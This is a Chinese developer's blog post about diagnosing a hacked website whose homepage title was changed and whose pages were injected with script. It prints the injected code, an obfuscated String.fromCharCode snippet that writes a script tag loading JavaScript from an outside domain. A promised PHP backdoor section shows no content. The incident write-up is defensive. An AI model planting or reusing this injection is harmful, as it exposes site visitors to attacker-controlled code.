黑客攻击网站,篡改首页问题排查修复

sunphp开发者2024-12-27 8:28

1,修改首页,并植入js

标题通过unicode编码,隐藏了

<title>&#24320;&#20113;&#40;&#20013;&#22269;&#41;&#75;&#97;&#105;&#121;&#117;&#110;&#183;&#23448;

js文件通过String.fromCharCode隐藏起来了

<script type="text/javascript"> var xt = String.fromCharCode(0,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,120,106,115,56,56,50,46,99,111,109,47,121,98,46,106,115,34,62,60, 47,115, 99,114,105,112,116,62); document.write(xt);

2,加入php后门

解码后在实际攻击内容如下

相关推荐
idealzouhu4 分钟前
【NDK开发】Android NDK 原生构建:ndk-build 与 CMake
android·ndk
shuangrenlong16 分钟前
android studio突然一直importing卡住
android·ide·android studio
码云数智-大飞18 分钟前
类型系统攻防战:PHP混合类型与联合类型对隐式类型转换漏洞的防御策略
android
寒秋花开曾相惜18 分钟前
(学习笔记)4.2 逻辑设计和硬件控制语言HCL(4.2.3 字级的组合电路和HCL整数表达式)
android·网络·数据结构·笔记·学习
zhangphil1 小时前
Android sql查媒体数据封装room Dao构造AndroidViewModel,RecyclerView宫格展示,Kotlin
android·kotlin
pengyu2 小时前
【Kotlin 协程修仙录 · 筑基境 · 中阶】 | 身份证与通行证:CoroutineContext 的深度解剖
android·kotlin
夏沫琅琊3 小时前
android 短信读取与导出技术
android·kotlin
dalancon3 小时前
Android LMKD 服务
android
迪普阳光开朗很健康3 小时前
告别繁琐!用ApkInfoQuick快速提取APK关键信息
android·rust·react
深度智能Ai3 小时前
GPT Image 2 图片生成 API 接口对接文档
android·gpt
热门推荐
01GitHub 镜像站点02近期有什么ai的新消息,新动态? 2026.4月032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot05Codex 接入 DeepSeek API 完整配置文档06【AI】2026 年具身智能模型和世界模型总结07在Windows 11上安装Docker的踩坑记录08零基础教你claude code 接入 deepseek V4092026年AI前瞻:量子AI、具身智能与科学发现的新纪元10VSCode + Copilot下:配置并使用 DeepSeek